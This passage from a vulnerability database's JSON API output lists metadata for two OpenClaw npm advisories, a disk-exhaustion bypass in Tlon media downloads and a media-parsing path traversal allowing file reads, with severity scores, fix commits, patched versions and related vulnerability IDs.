            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2v8n-mnws-jfc9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89183?format=api",
            "vulnerability_id": "VCID-2wr9-h42m-a7ev",
            "summary": "OpenClaw: Tlon media downloads can bypass core safety limits and exhaust disk\n## Summary\nTlon media downloads can bypass core safety limits and exhaust disk\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Tlon media downloads bypassed core size/count/cleanup limits, but this is availability-only resource exhaustion in a bundled plugin path, so low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2194587d70d2aef863508b945319c5a7c88b12ce` — 2026-03-31T19:40:15+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41408",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16254",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16298",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16308",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41408"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41408",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41408"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4g5x-2jfc-xm98",
                    "reference_id": "GHSA-4g5x-2jfc-xm98",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4g5x-2jfc-xm98"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41408",
                "GHSA-4g5x-2jfc-xm98"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2wr9-h42m-a7ev"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89250?format=api",
            "vulnerability_id": "VCID-32zs-2zs9-uufs",
            "summary": "OpenClaw: Media Parsing Path Traversal Leads to Arbitrary File Read\n## Summary\nOpenClaw <= 2026.3.24 Media Parsing Path Traversal to Arbitrary File Read\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `4797bbc5b96e2cca5532e43b58915c051746fe37` — 2026-03-25T13:35:16-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f6pf-4gjx-c94r",
                    "reference_id": "GHSA-f6pf-4gjx-c94r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f6pf-4gjx-c94r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
